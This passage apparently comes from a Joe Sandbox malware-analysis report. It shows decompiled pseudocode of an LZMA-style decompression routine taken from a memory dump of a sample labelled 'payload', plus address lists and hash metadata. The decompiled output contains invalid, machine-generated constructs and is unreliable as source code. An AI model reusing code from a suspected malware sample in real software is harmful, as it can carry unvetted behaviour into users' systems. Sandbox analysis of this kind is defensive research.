								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x004061a5
0x004061ac
0x004061b2
0x004061b8
0x00000000
0x004061bc
0x004061c8
0x004061c8
0x004061c8
0x004061d1
0x00000000
0x00000000
0x004061d7
0x00000000
0x004061de
0x004061e2
0x00000000
0x00000000
0x004061eb
0x004061ee
0x004061f1
0x004061f3
0x004061f5
0x00000000
0x00000000
0x004061fb
0x004061fe
0x00406200
0x00406201
0x00406204
0x00406206
0x00406207
0x00406209
0x0040620c
0x00406211
0x00406216
0x0040621f
0x00406232
0x00406235
0x0040623e
0x00406241
0x00406269
0x00406269
0x0040626b
0x00406279
0x00406279
0x0040627d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040626d
0x0040626d
0x00406270
0x00406270
0x00406271
0x00406271
0x00000000
0x0040626d
0x00406243
0x00406247
0x0040624c
0x0040624c
0x00406255
0x0040625b
0x0040625d
0x00406260
0x00000000
0x00406266
0x00406266
0x00000000
0x00406266
0x00000000
0x00406283
0x00406283
0x00406287
0x00406b33
0x00000000
0x00406b33
0x00406290
0x004062a0
0x004062a3
0x004062a6
0x004062a6
0x004062a6
0x004062a9
0x004062a9
0x004062ad
0x00000000
0x00000000
0x004062af
0x004062b2
0x004062b5
0x004062df
0x004062e5
0x004062ec
0x00000000
0x004062ec
0x004062b7
0x004062bb
0x004062be
0x004062c3
0x004062c3
0x004062ce
0x004062d4
0x004062d6
0x004062d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040631e
0x00406324
0x00406327
0x00406334
0x0040633c
0x00000000
0x00000000
0x004062f3
0x004062f3
0x004062f7
0x00406b42
0x00000000
0x00406b42
0x00406303
0x0040630e
0x0040630e
0x0040630e
0x00406311
0x00406314
0x00406317
0x0040631a
0x0040631c
0x00000000
0x00000000
0x00000000
0x00000000
0x004069b3
0x004069b3
0x004069b9
0x004069bf
0x004069c2
0x004069c5
0x004069df
0x004069e2
0x004069e8
0x004069f3
0x004069f3
0x004069f5
0x004069c7
0x004069c7
0x004069d6
0x004069da
0x004069da
0x004069f8
0x004069ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a01
0x00406a01
0x00406a05
0x00406bb4
0x00000000
0x00406bb4
0x00406a11
0x00406a18
0x00406a20
0x00406a20
0x00406a20
0x00406a23
0x00406a26
0x00406a26
0x00000000
0x00000000
0x00406344
0x00406346
0x00406349
0x004063ba
0x004063bd
0x004063c0
0x004063c7
0x004063d1
0x00000000
0x004063d1
0x0040634b
0x0040634f
0x00406352
0x00406354
0x00406357
0x0040635a
0x0040635c
0x0040635f
0x00406361
0x00406366
0x00406369
0x0040636c
0x00406370
0x00406377
0x0040637a
0x00406381
0x00406385
0x0040638d
0x0040638d
0x0040638d
0x00406387
0x00406387
0x00406387
0x0040637c
0x0040637c
0x0040637c
0x00406391
0x00406394
0x004063b2
0x004063b4
0x00000000
0x004063b4
0x00406396
0x00406399
0x0040639c
0x0040639f
0x004063a1
0x004063a1
0x004063a1
0x004063a4
0x004063a7
0x004063a9
0x004063aa
0x004063ad
0x00000000
0x00000000
0x004065e3
0x004065e7
0x00406605
0x00406608
0x0040660f
0x00406612
0x00406615
0x00406618
0x0040661b
0x0040661e
0x00406620
0x00406627
0x00406628
0x0040662a
0x0040662d
0x00406630
0x00406633
0x00406633
0x00406638
0x00000000
0x00406638
0x004065e9
0x004065ec
0x004065ef
0x004065f9
0x00000000
0x00000000
0x0040664d
0x00406651
0x00406674
0x00406677
0x0040667a
0x00406684
0x00406653
0x00406653
0x00406656
0x00406659
0x0040665c
0x00406669
0x0040666c
0x0040666c
0x00000000
0x00000000
0x00406690
0x00406694
0x00000000
0x00000000
0x0040669a
0x0040669e
0x00000000
0x00000000
0x004066a4
0x004066a6
0x004066aa
0x004066aa
0x004066ad
0x004066b1
0x00000000
0x00000000
0x00406701
0x00406705
0x0040670c
0x0040670f
0x00406712
0x0040671c
0x00000000
0x0040671c
0x00406707
0x00000000
0x00000000
0x00406728
0x0040672c
0x00406733
0x00406736
0x00406739
0x0040672e
0x0040672e
0x0040672e
0x0040673c
0x0040673f
0x00406742
0x00406742
0x00406745
0x00406748
0x0040674b
0x0040674b
0x0040674e
0x00406755
0x0040675a
0x00000000
0x00000000
0x004067e8
0x004067e8
0x004067ec
0x00406b8a
0x00000000
0x00406b8a
0x004067f2
0x004067f5
0x004067f8
0x004067fc
0x004067ff
0x00406805
0x00406807
0x00406807
0x00406807
0x0040680a
0x0040680d
0x00000000
0x00000000
0x004063dd
0x004063dd
0x004063e1
0x00406b4e
0x00000000
0x00406b4e
0x004063e7
0x004063ea
0x004063ed
0x004063f1
0x004063f4
0x004063fa
0x004063fc
0x004063fc
0x004063fc
0x004063ff
0x00406402
0x00406402
0x00406405
0x00406408
0x00000000
0x00000000
0x0040640e
0x00406414
0x00000000
0x00000000
0x0040641a
0x0040641a
0x0040641e
0x00406421
0x00406424
0x00406427
0x0040642a
0x0040642b
0x0040642e
0x00406430
0x00406436
0x00406439
0x0040643c
0x0040643f
0x00406442
0x00406445
0x00406448
0x00406464
0x00406467
0x0040646a
0x0040646d
0x00406474
0x00406478
0x0040647a
0x0040647e
0x0040644a
0x0040644a
0x0040644e
0x00406456
0x0040645b
0x0040645d
0x0040645f
0x0040645f
0x00406481
0x00406488
0x0040648b
0x00000000
0x00406491
0x00000000
0x00406491
0x00000000
0x00406496
0x00406496
0x0040649a
0x00406b5a
0x00000000
0x00406b5a
0x004064a0
0x004064a3
0x004064a6
0x004064aa
0x004064ad
0x004064b3
0x004064b5
0x004064b5
0x004064b5
0x004064b8
0x004064bb
0x004064bb
0x004064bb
0x004064c1
0x00000000
0x00000000
0x004064c3
0x004064c6
0x004064c9
0x004064cc
0x004064cf
0x004064d2
0x004064d5
0x004064d8
0x004064db
0x004064de
0x004064e1
0x004064f9
0x004064fc
0x004064ff
0x00406502
0x00406502
0x00406505
0x00406509
0x0040650b
0x004064e3
0x004064e3
0x004064eb
0x004064f0
0x004064f2
0x004064f4
0x004064f4
0x0040650e
0x00406515
0x00406518
0x00000000
0x0040651a
0x00000000
0x0040651a
0x00406518
0x0040651f
0x0040651f
0x0040651f
0x0040651f
0x00000000
0x00000000
0x0040655a
0x0040655a
0x0040655e
0x00406b66
0x00000000
0x00406b66
0x00406564
0x00406567
0x0040656a
0x0040656e
0x00406571
0x00406577
0x00406579
0x00406579
0x00406579
0x0040657c
0x0040657f
0x0040657f
0x00406585
0x00406523
0x00406523
0x00406526
0x00000000
0x00406526
0x00406587
0x00406587
0x0040658a
0x0040658d
0x00406590
0x00406593
0x00406596
0x00406599
0x0040659c
0x0040659f
0x004065a2
0x004065a5
0x004065bd
0x004065c0
0x004065c3
0x004065c6
0x004065c6
0x004065c9
0x004065cd
0x004065cf
0x004065a7
0x004065a7
0x004065af
0x004065b4
0x004065b6
0x004065b8
0x004065b8
0x004065d2
0x004065d9
0x004065dc
0x00000000
0x004065de
0x00000000
0x004065de
0x00000000
0x0040686b
0x0040686b
0x0040686f
0x00406b96
0x00000000
0x00406b96
0x00406875
0x00406878
0x0040687b
0x0040687f
0x00406882
0x00406888
0x0040688a
0x0040688a
0x0040688a
0x0040688d
0x00000000
0x00000000
0x0040663b
0x0040663b
0x0040663e
0x00000000
0x00000000
0x0040697a
0x0040697e
0x004069a0
0x004069a3
0x004069ad
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x00406980
0x00406983
0x00406987
0x0040698a
0x0040698a
0x0040698d
0x00000000
0x00000000
0x00406a37
0x00406a3b
0x00406a59
0x00406a59
0x00406a59
0x00406a60
0x00406a67
0x00406a6e
0x00406a6e
0x00000000
0x00406a6e
0x00406a3d
0x00406a40
0x00406a43
0x00406a46
0x00406a4d
0x00406991
0x00406991
0x00406994
0x00000000
0x00000000
0x00406b28
0x00406b2b
0x00000000
0x00000000
0x00406762
0x00406764
0x0040676b
0x0040676c
0x0040676e
0x00406771
0x00000000
0x00000000
0x00406779
0x0040677c
0x0040677f
0x00406781
0x00406783
0x00406783
0x00406784
0x00406787
0x0040678e
0x00406791
0x0040679f
0x00000000
0x00000000
0x00406a75
0x00406a75
0x00406a78
0x00406a7f
0x00000000
0x00000000
0x00406a84
0x00406a84
0x00406a88
0x00406bc0
0x00000000
0x00406bc0
0x00406a8e
0x00406a91
0x00406a94
0x00406a98
0x00406a9b
0x00406aa1
0x00406aa3
0x00406aa3
0x00406aa3
0x00406aa6
0x00406aa9
0x00406aa9
0x00406aa9
0x00406aa9
0x00406aac
0x00406aac
0x00406ab0
0x00406b10
0x00406b13
0x00406b18
0x00406b19
0x00406b1b
0x00406b1d
0x00406b20
0x00406a2c
0x00406a2c
0x00000000
0x00406a2c
0x00406ab2
0x00406ab8
0x00406abb
0x00406abe
0x00406ac1
0x00406ac4
0x00406ac7
0x00406aca
0x00406acd
0x00406ad0
0x00406ad3
0x00406aec
0x00406aef
0x00406af2
0x00406af5
0x00406af9
0x00406afb
0x00406afb
0x00406afc
0x00406aff
0x00406ad5
0x00406ad5
0x00406add
0x00406ae2
0x00406ae4
0x00406ae7
0x00406ae7
0x00406b02
0x00406b09
0x00000000
0x00406b0b
0x00000000
0x00406b0b
0x00000000
0x004067a7
0x004067aa
0x004067e0
0x00406910
0x00406910
0x00406910
0x00406910
0x00406913
0x00406913
0x00406916
0x00406918
0x00406ba2
0x00000000
0x00406ba2
0x0040691e
0x00406921
0x00000000
0x00000000
0x00406927
0x0040692b
0x0040692e
0x0040692e
0x0040692e
0x00000000
0x0040692e
0x004067ac
0x004067ae
0x004067b0
0x004067b2
0x004067b5
0x004067b6
0x004067b8
0x004067ba
0x004067bd
0x004067c0
0x004067d6
0x004067db
0x00406813
0x00406813
0x00406817
0x00406843
0x00406845
0x0040684c
0x0040684f
0x00406852
0x00406852
0x00406857
0x00406857
0x00406859
0x0040685c
0x00406863
0x00406866
0x00406893
0x00406893
0x00406896
0x00406899
0x0040690d
0x0040690d
0x0040690d
0x00000000
0x0040690d
0x0040689b
0x004068a1
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068d5
0x004068d7
0x004068da
0x004068db
0x004068de
0x004068e0
0x004068e3
0x004068e5
0x004068e7
0x004068ea
0x004068ec
0x004068ef
0x004068f3
0x004068f5
0x004068f5
0x004068f6
0x004068f9
0x004068fc
0x004068be
0x004068be
0x004068c6
0x004068cb
0x004068cd
0x004068d0
0x004068d0
0x004068ff
0x00406906
0x00406890
0x00406890
0x00406890
0x00406890
0x00000000
0x00406908
0x00000000
0x00406908
0x00406906
0x00406819
0x0040681c
0x0040681e
0x00406821
0x00406824
0x00406827
0x00406829
0x0040682c
0x0040682f
0x0040682f
0x00406832
0x00406832
0x00406835
0x0040683c
0x00406810
0x00406810
0x00406810
0x00406810
0x00000000
0x0040683e
0x00000000
0x0040683e
0x0040683c
0x004067c2
0x004067c5
0x004067c7
0x004067ca
0x00000000
0x00000000
0x00406529
0x00406529
0x0040652d
0x00406b72
0x00000000
0x00406b72
0x00406533
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406542
0x00406545
0x00406547
0x0040654a
0x0040654d
0x00406550
0x00406552
0x00406552
0x00406552
0x00000000
0x00000000
0x004066b4
0x004066b4
0x004066b8
0x00406b7e
0x00000000
0x00406b7e
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066c9
0x004066c9
0x004066c9
0x004066cc
0x004066cf
0x004066d2
0x004066d5
0x004066d8
0x004066db
0x004066dc
0x004066de
0x004066de
0x004066de
0x004066e1
0x004066e4
0x004066e7
0x004066ea
0x004066ea
0x004066ea
0x004066ed
0x004066ef
0x004066ef
0x00000000
0x00000000
0x00406931
0x00406931
0x00406931
0x00406935
0x00000000
0x00000000
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406946
0x00406946
0x00406946
0x00406949
0x0040694c
0x0040694f
0x00406952
0x00406955
0x00406958
0x00406959
0x0040695b
0x0040695b
0x0040695b
0x0040695e
0x00406961
0x00406964
0x00406967
0x0040696a
0x0040696e
0x00406970
0x00406973
0x00000000
0x00406975
0x004066f2
0x004066f2
0x00000000
0x004066f2
0x00406973
0x00406ba8
0x00406bca
0x00406bd0
0x00406bd2
0x00406bd9
0x00000000
0x00000000
0x004061d7
0x00406bdf
0x00406bdf
0x00000000

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bfff9db2859b877ca6a77ec9405565887134ef839be144d68b3806b8d7c08ac
Instruction ID: 4327eab70650ef0c96a691b493921a8ab8e5ba0d824f916f670fcb6a13d6a8f8
Opcode Fuzzy Hash: 5bfff9db2859b877ca6a77ec9405565887134ef839be144d68b3806b8d7c08ac
Instruction Fuzzy Hash: 11816671D04228DBDF24CFA8C8447ADBBB1FB44315F2181AED856BB281C7786A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004065E3 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004065E3() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406BE7))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
